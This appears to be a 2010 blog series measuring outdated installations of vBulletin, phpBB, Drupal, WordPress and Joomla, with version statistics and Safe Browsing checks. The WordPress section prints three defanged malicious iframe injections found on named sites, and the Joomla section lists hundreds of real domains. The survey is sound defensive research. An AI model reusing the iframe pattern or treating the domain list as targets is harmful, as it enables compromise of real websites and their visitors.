vBulletin is a little bit different than the list of CMSes we have been analyzing in this series. The first and most apparent being that it is not a free piece of software. The vBulletin site displays a cost of $195-$285 for a new license. The obvious question then, is why do people pay for this CMS when there are other good CMSs available for free? The answer lies in the varied list of features, such as a built-in photo album, event management and many other interesting and helpful features. Add to this good support, compatibility with existing software, many themes, built-in integration for payment engines and advertisement support… it’s not hard to see why vBulletin has acquired a large fan base.

Next, we will take a closer look at vBulletin to understand security issues facing active installations seen publicly on the Internet.

The aim of this experiment:

• To determine the number of vBulletin sites using older versions of the CMS package (and hence vulnerable to attacks).
• To identify the associated scripts vBulletin that users install in addition to core vBulletin functionality.
• Identify the vulnerabilities of using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed vBulletin. Understandably, not all 100,000 websites would actually be using vBulletin. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by vBulletin or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 5th and February 8th, 2010.

Distribution of vBulletin versions:

In 93.09% of sites running on vBulletin the version number could be identified. We found the following distribution of vBulletin versions in the websites examined (where versions of installations could be determined). A more detailed breakdown of the distribution of vBulletin versions can be seen at the end of this article.

Significant numbers of older vBulletin installations are present on the Internet.

Note: Publicly available information about exploits for vBulletin 3.x.x and earlier versions exist. [1] [2]

We present the most interesting results here:

• Nearly 95% (see graph above) of vBulletin sites are running older versions for which exploits are available.
• None of the vBulletin sites were blacklisted by Google Safe Browsing.
• Only 13.5% of vBulletin sites had Iframes embedded in them. None of the Iframes were obfuscated or tried to load malware. All Iframes found loaded ads.
• 10.2% of the vBulletin sites which had Iframes were using JQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• Only 0.1% of the vBulletin sites use Mootools
• None of the vBulletin sites use AC_RunActiveContent.js.

Conclusion:

This limited experiment shows that like WordPress, vBulletin also suffers from a large number of vulnerable installations being available on the Internet. It is intriguing to see that a CMS system, which is not free, and is tightly controlled is not kept up to date across the board. Consider the case of Drupal, where we observed that the variety in the versions of various installations is very low. The natural question at this point is: why is a free CMS system like Drupal doing better, security-wise, than a commercial CMS system like vBulletin? Why are most Drupal installations up to date. One thing to note though is that like Drupal and phpBB, vBulletin installations also seem to be relatively safe from the most prevalent malware. Most Iframes on vBulletin sites are Ads, a likely revenue stream for most forum admins.

The fact remains that there many vulnerable installations of vBulletin which can fall prey to malicious hackers.

Till next time.

See below for detailed breakdown of the distribution of vBulletin versions:

• 0.89% of sites were running version 3.0.13
• 0.29% of sites were running version 3.0.14
• 0.29% of sites were running version 3.0.3
• 0.29% of sites were running version 3.0.5
• 0.29% of sites were running version 3.0.7
• 1.18% of sites were running version 3.5.2
• 2.67% of sites were running version 3.5.4
• 0.29% of sites were running version 3.6.1
• 1.18% of sites were running version 3.6.10
• 0.59% of sites were running version 3.6.12
• 1.18% of sites were running version 3.6.2
• 4.45% of sites were running version 3.6.4
• 0.29% of sites were running version 3.6.6
• 1.48% of sites were running version 3.6.7
• 4.74% of sites were running version 3.6.8
• 0.29% of sites were running version 3.6.9
• 2.96% of sites were running version 3.7.0
• 2.37% of sites were running version 3.7.1
• 1.78% of sites were running version 3.7.2
• 4.74% of sites were running version 3.7.3
• 2.37% of sites were running version 3.7.4
• 1.18% of sites were running version 3.7.5
• 2.96% of sites were running version 3.7.6
• 1.48% of sites were running version 3.8.0
• 8.90% of sites were running version 3.8.1
• 10.3% of sites were running version 3.8.2
• 3.85% of sites were running version 3.8.3
• 31.7% of sites were running version 3.8.4
• 2.07% of sites were running version 4.0.0
• 2.07% of sites were running version 4.0.1
• 0.59% of sites were running version 4.0.2

I can already hear CMS purists howling that phpBB is not a CMS. In a way they’re right, but in other ways it is a CMS.  phpBB is without a doubt one of the most popular “Internet Forum” software packages available. Its ease of installation, various custom skins, and large installation base make it a very attractive choice for anyone who wishes to set up a community discussion board on the Internet. phpBB has had a few million downloads at the very least and enjoys a very active user group.

phpBB is popular among webmasters who want to set up Internet forums easily. Users of phpBB also benefit from a high level of customization. Another big plus for this CMS. Support for this CMS is awesome, in fact, phpBB has flash based video tutorials to help new users get started! Additionally, the phpBB developer community is very security conscious.

Next, we will take a close look at phpBB to understand security issues with active installations seen publicly on the Internet.

The aim of this experiment:

• To determine the number of phpBB sites using older versions of the CMS package (and hence vulnerable to attacks).
• Identify the associated scripts phpBB users install in addition to core phpBB functionality.
• Identify the vulnerabilities of using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed phpBB. Understandably, not all 100,000 websites would actually be using phpBB. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by phpBB or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 1st and February 3rd, 2010.

Distribution of phpBB versions:

In 84.16% of sites running on phpBB a version number of the CMS package could be identified. We found the following distribution of phpBB versions in the websites examined (where versions of installations could be determined).

• 32.2% of sites were running version 2.x
  Note: Publicly available information about exploits for phpBB 2.x versions exist.
• 67.8% of sites were running version 3.x

We present the most interesting results:

• None of the phpBB sites were blacklisted by Google Safe Browsing.
• Only 2.5% of phpBB sites had Iframes embedded in them. None of the Iframes were obfuscated or tried to load malware.
• None of the phpBB sites which had Iframes were using JQuery.
  
• About 4.2% of all phpBB sites use jQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• Only 0.3% of the phpBB sites use Mootools.
• Only 0.3% of the phpBB sites use AC_RunActiveContent.js.

Conclusion:

This limited experiment shows that like Drupal, phpBB installations seem to be relatively safe from the most prevalent forms of malware. However, the fact remains that there are quite a few vulnerable installations of phpBB which can fall prey to malicious hackers. This trend is echoed by our analysis of WordPress . It will be interesting to probe further and understand why the number of “infected” sites is not higher when there are vulnerable installations in the wild.

Till next time.

Drupal is another prime example of a modern CMS. With more than 250,000 weekly hits to its APIs, this CMS has gained immense popularity! One would agree with the statement on the Drupal site which proclaims: “Tens of thousands of people and organizations are using Drupal to power scores of different web sites”.

Similar to the other CMSs which we have profiled in this series, Drupal offers the flexibility to manage content easily, add attractive themes and otherwise customize websites. Considering the plethora of themes available through the Drupal website, users seem to be very conscious of the attractiveness of their sites.

In this post we will be taking a close look at Drupal to understand any interesting issues with active installations publicly seen on the Internet.

The aim of this experiment:

• What associated scripts do Drupal users use in addition to core Drupal functionality?
• What are the vulnerabilities of using the associated scripts?

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed Drupal. Understandably, not all 100,000 websites were actually using Drupal. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by Drupal or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between January 28th and January 30th, 2010.

We present the most interesting results in brief:

• None of the Drupal sites were blacklisted by Google Safe Browsing.
• 10.1% of Drupal sites had Iframes embedded in them. None of the Iframes were obfuscated or tried to load malware.
• 79.3% of Drupal sites which had Iframes were using JQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• A whopping 66.2% of all Drupal sites use jQuery.
• None of the Drupal sites use Mootools.
• Only 1.7% of the Drupal sites use AC_RunActiveContent.js.

Conclusion:

This limited experiment shows that unlike some of the other CMS packages we have looked at, Drupal installations seem to be safe from the most prevalent malware. Furthermore, it seems that the correlation between Drupal users and jQuery users is much tighter than in the case of other CMS packages. It might be an interesting point to probe further, to understand why the number of infected Drupal installations is much less than the number of infected installations of other CMS systems while jQuery continues to be a common attack vector.

Till next time.

WordPress is a prime example of a popular CMS. With more than 8,176 plugins and 73,037,498 downloads, this particular CMS package is extremely popular! I would agree with the statement on the WordPress site which proclaims: “WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability.” It is.

WordPress also offers the flexibility to manage content easily, add attractive themes and customize webpages to your hearts content. And again quoting the main site: “Plugins can extend WordPress to do almost anything you can imagine.” I would agree with this too.

In this post we will be looking at WordPress closely to understand any interesting properties of the active installations publicly seen on the Internet.

The aim of this experiment:

• To determine the number of WordPress sites using older versions of the CMS package (and hence vulnerable to attacks).
• What are the associated scripts do WordPress users use in addition to core WordPress functionality?
• What are the vulnerabilities of using the associated scripts?

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed WordPress. Understandably, not all 100,000 websites would actually be using WordPress. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by WordPress or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between January 28th and January 30th, 2010.

Distribution of WordPress versions:

• 30.9% of sites were running version 2.9.1
• 4.7% of sites were running version 2.9
• 9.14% of sites were running version 2.8.6
• 4.7% of sites were running version 2.8.5
• 21.42% of sites were running version 2.8.4
• 7.1% of sites were running version 2.8.2
• 9.14% of sites were running version 2.7.1
• 2.3% of sites were running version 2.6.2
• 2.3% of sites were running version 2.6
• 2.3% of sites were running version 2.1.3
• 2.3% of sites were running version 2.0.4

We found the following distribution of WordPress versions in the websites examined (where versions of installations could be determined).
Note: Publicly available information about exploits for WordPress version < 2.8.6 exist.

We present the most interesting results in brief:

• Only 0.18% of the WordPress sites were blacklisted by Google Safe Browsing.
• Only 1.6% of WordPress sites had Iframes embedded in them. We found that all these sites harbored Iframe based malware. The Iframes were not obfuscated (examples provided below)
• 44.4% of WordPress sites which had Iframes were using JQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• About 7.2% of all WordPress sites use jQuery.
• None of the WordPress sites use Mootools.
• None of the WordPress sites use AC_RunActiveContent.js.

Examples of malware found:

Now we present some examples of the non-obfuscated malware that was detected on some of the analyzed sites.

Example Code #1,  detected on: olgamake.com/wp-login.php?action=lostpassword

<if ra e src="hxxp://a151.scrappi ng.cc:80 80/ts/in. cgi ?op en" width=971 height=0 style="visibility: hi dden"></i fra m e>

Example Code #2,  detected on: makinghimknown.com/wp-login.php

<if ra e src="src="hxxp://ke ymydoma ins.com/" width="3" height="2"></i fra m e>

Example Code #3,  detected on: bisoppreview.com/wp-login.php

<if ra e src="hxxp://ntw porta l.com/" w idth="2" hei ght="4"</i fra m e>

Conclusion:

This limited experiment shows that there are many older WordPress installations active on the Internet. Furthermore, some of them are have been infected by non-obfuscated Iframes which point to malicious websites to load exploit code dynamically. WordPress makes for an easy target by lieu of its popularity and wide installation base. The people associated with this CMS software take security very seriously and have done a great job releasing security patches and stable releases. However, the fact remains that vulnerable versions of WordPress are live on the Internet and are hosting malware, primarily via infected Iframes.

Till next time.

CMS software packages have gained widespread popularity owing to the easy to use interface they provide to web-administrators. CMS packages can be easy to set up. Most web hosting companies already have CMS packages ready to be set up on their client’s account, all the clients need to do is click a button in their hosting control panel! Furthermore, maintaining web-pages using CMS software takes away the pain of keeping track of multiple versions, manually granting user permissions and other mundane issues.

Joomla is prime example of popular CMS packages. With thousands of downloads and upwards of 7,000 followers on Twitter, this CMS package is extremely popular among web-administrators and content publishers. Joomla offers the flexibility to manage content easily, add attractive themes and customize web-pages to your hearts content. All this can be achieved without having any programming experience.

In this series of posts, we will be looking at five popular CMSs. Joomla is the first one on which we will focus.

The aim of the experiment:

• To determine the number of Joomla sites using older versions of the CMS package (and hence vulnerable to attacks).
• What associated scripts do Joomla users use in addition to core Joomla functionality?
• What are the vulnerabilities of using the associated scripts?

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed Joomla. Understandably, not all 100,000 websites would actually be using Joomla. Of these, approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by Joomla. Each website was also cross-referenced with the Google Safe Browsing List. The experiment was completed between January 27th and January 29th, 2010.

We present the most interesting results in brief:

• In 80.25% of Joomla websites examined, the version of the installation could be determined.
• All websites for which the Joomla version could be identified were running Joomla 1.5.
  Note: Publicly available exploits for Joomla version < 1.5.6 exist.
• None of the Joomla sites were blacklisted by Google Safe Browsing.
• Only 0.84% of Joomla sites had Iframes embedded in them.
• 75% of Joomla sites using Iframes were using Mootools.
• 79% of Joomla sites use Mootools.
  Note: MooTools has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• Only 0.42% of Joomla sites use AC_RunActiveContent.js.
  Note: When using HTML templates in Flash CS3 Professional, a JavaScript file linked to the HTML file, named AC_RunActiveContent.js is automatically created.
• Only 0.63% of Joomla sites use jQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.

This limited experiment showed that there is a correlation between Joomla installations and vulnerabilities targeted by hackers to spread malware. It will be interesting to compare this trend with the trends of the CMS packages that we will analyze in the coming days. Nonetheless, it is heartening to see that none of the websites hosting Joomla 1.5 were actually listed on Google’s Safe Browsing List.

Till next time.

Below we present a sample of the websites using Joomla.

123ror.no
123-vle.com
1-euro-gmbh.com
1stoneonline.org
22paths.com
5-bhai.org
989vip.com
abc-webshop.com
abqjournal.com
absolutetraders.co.za
absolutionists.com
aerospacehorizons.com
afocusonyourfuture.com
akiraciai.com
albania4arab.com
alkatron.it
allbdevents.com
alphasoundstudios.com
anesthesiacare.com
angkasa.gov.my
annmurphyflorists.com
aominions.org
ap2.joomlapraise.com
apfmi.com
arabicamusic.tv
arawaktech.com
aritcon.de
atelier-rousseaufrederic.com
autoadoption.com
azbukapro.net
babymar.net
back2africa.nl
balittro.litbang.deptan.go.id
bassittenterprises.com
bavdw.com
beancounterz.org
bebejour.com
bellevuecollisioncare.com
belmontstudenthousing.com
bhpartners.net
biblioteca.catie.ac.cr
bic.moe.go.th
big-sammys-hotdogs.com
big-sammyshotdogs.com
billhope.net
brandartistlife.com
brazilpedia.com
brazzilinfo.com
brokerlarry.com
budgetsupplement.nl
bulgarialettings.co.uk
buttonwillowhq.com
calaqueroleta.com
cantyouhear.com
carbonkiller.com
caribbeancomputercompany.com
caribenscoutgroup.org
cartagocomercial.com
ccauroraems.com
cehcp.org
cellularoptimization.com
centralcoastlavenderfestival.com
centrocnc.com
centrometeosiciliano.com
chaipat.or.th
chechenews.com
chezcesaria.com
chuckdiehl.com
classics.uc.edu
clipcdc.com
cmfm.net
cobaltcamera.com
co.douglas.ne.us
colegioignacioaldama.com
coltraining.org
combilling.ru
computerscm.com
connorsphotography.net
crezz.org
crittersgallery.com
cuibs.org
cygnet-ecm.com
cypcstore.com
d22485318.a37.agcreativehosting.com
dakofix.de
dan-brown.org
darklevel.org
davidstanleytransport.com
dcuweb.com
deckboat.co.za
delmarfishing.com
demo.mosets.com
denicarnahan.com
detcompservices.com
diabetic-health.info
discospheric.com
dmgmusicgroup.com
docwithms.com
dongvienthai.com
dreamtive.com
drnunemacher.com
droidcon.de
drsusiehill.com
dsmdataservices.com
dubmum.com
dunklspace.com
dwaynemorris.com
ebay-is-out.com
e-dynamics.net
elaps-timing.com
ellistyle.com
email-synchronisation.com
energyharvestpr.com
esperantox.com
eventklik.com
evergreenrugby.com
evropskemesto.cz
famiri-lisse.com
fishbowlpr.com
flyingphoenixheavenlyhealingchikung.com
fma.or.th
focusonyourfuture.com
freshoutsourcing.com
freshwaterbolivar.com
frittomisto.co.uk
gattos.co.uk
ghtex.com
gibreview.com
glenwinfield.com
globalclear.org
globalfreejob.com
globalhudson.com
globalstandards.com.au
guneseviprojesi.com
gvdiabetes.com
hamroyatayat.com
hcasaints.net
health-only.com
heliossrl.eu
herenistarion.org
herenya.com
highereducationmanagement.eu
hiregolfclubsdubai.com
hostiopatiacancun.com
hostmyreports.com
host.nodesixvps.com
htdquailguideservice.com
huacatambo.com
hypnosis-mp3.com
iajgs.org
ibeatradio.com
ibexevents.com.au
icoayouths.com
idiverseme.com
ihelpchurch.com
infopascani.ro
internal.mmi.co.id
intimacyquestions.com
ioc3.unesco.org
ipeterborough.com
ipitest.com
issnaf.org
iwebxpert.net
jackogle.info
jaguar.boxsecured.com
jaildata.net
jamskater.com
jewelrywebstores.com
jini.gr
jinovc.com
jmandgroup.com
joomfish.org
joomla2me.com
jrosecatering.com
juarezcustomhomes.com
jyperkins.com
kaarigar.net
kedema.com
khushab.org
killtribe.com
kycstudios.com
lagartozero.com
lapocioni.net
lawyerarlington.com
learn-web-hacking.com
levietphuc.com
lexprototus.com
liquidcrystalsounds.com
livingoceansfoundation.org
llstoreuk.com
loungebase.com
lovekeke.com
low-gi.info
macmagicians.com
mad-as-hell.org
malandscape.net
mambo.web-joy.de
marksotelo.com
mathewgagnon.net
mekofa.dbbank.net
mikestute.com
mileagecorrectionservices.com
mindyourbusiness.net
mit.undip.ac.id
mjkltd.net
modavideolari.com
mongoosepress.info
montrealquebeclatino.com
morgansisland.net
motobuzz.co.cc
mountainxtra.com
mpninsider.com
mthoodfun.com
muddyjosh.com
mylanka.org
myperfectalgeria.com
mywillinstructed.com
nappydread-i.com
naturwissenschaftler.de
neidevserver.net
newgrantinfo.com
newsitebuilders.com
number12secret.com
obcian.com
ocsopedia.com
odw.biz
oldbenzhome.com
oldchevyshome.com
oldcornersaloon.com
oldfordshome.com
oldminishome.com
oldmoparshome.com
oldrovershome.com
oldtruckshome.com
oldvwshome.com
olympusmobile.net
omnium-gatherum.net
organics-recycling.org.uk
organizeutah.com
ost-au.com
osteopatiacancun.com
parrishwomble.com
pasautorepair.com
pcb-design.org
pfoa-mc.org
pfoa-ms.org
pieceofcakekitchen.com
pilsum.com
platinum-cars-uk.com
plot-shop-online.de
poderesaude.com.br
postcardsfromlasvegas.com
prezemi.com
primetarget.org
primrosetelecom.co.uk
profootballdraftinsider.com
prohairsupplies.com
projectnucleus.org
protestthehero.eu
purebreaddeli.com
quadcitysquares.com
rainbowextravaganza.com
rapatsa.com
rarenovaction.com
rawinontario.com
rechtsanwalt-online.eu
remembertheyard.com
roomatthecastle.com
roylon.com
rshm.gov.tr
saletop.com
salvitae.eu
sandyrosenbaum.com
sarah-kurtz.org
scenicworld.co.uk
scienceworksforus.org
sdakinship.net
seblod-dev.com
seegchina.eu
serenajohnson.org
sharelancer.com
silverstarmountain.ca
silvertipgroup.com
simplyaskus.com
sindhhyd.com
siparuntum.com
siteground11.com
sjubc.com
sovereignty-empire.com
spoorsweb.nl
sportingconservation.org
spravochnic.com
stalyticsdemo.com
stampsales.net
stanleyvictor.com
stefanomazza.net
stmarkcentre.org.uk
sunithi.freei.me
superhorsetraining.com
swimwithjenny.co.uk
synopticcoders.co.uk
sysexpo.com
tamilcircle.net
team4fun.eu
testingforclient.com
tfmandassociatesinc.com
thebattleforliberty.com
theeyesarethesame.com
themandalfamily.com
tibebat.com
time4nascar.com
tingtinghan.net
tinocoysantamaria.com
ti-wow.com
town.williston.vt.us
tpsacanada.com
translationmanager.org
trkconsulting.org
tropicaleditions.com
tuxpro.com
tychoseye.nl
un-instraw.org
unitekk.com
usaffiliates.net
usroot.com
vajira.ac.th
ventaszonafranca.com
vibranted.com
virtualpbxcompare.info
vividtuning.com
waverleywoollahra.ses.nsw.gov.au
websauce.org.au
welldone-hannah.com
westsidepawn.biz
wetzlar-kurier.net
wheninvisiblechildrensing.org
whereyougot.com
wilhelminaschool.eu
windjammerlodge.com
wolverine2812.com
womenoftheucc.com
ws1.njpac.org
wtfchefs.us
www3a.biotec.or.th
xband.eu
xenones.gr
xpand-productions.com
xperteaze.net
yahyaayhanacar.com
yarmouthnet.com
yellow-advertising.com
yourchoicetech.com
youreasymemories.com
zephyrfm.com
zombiz.net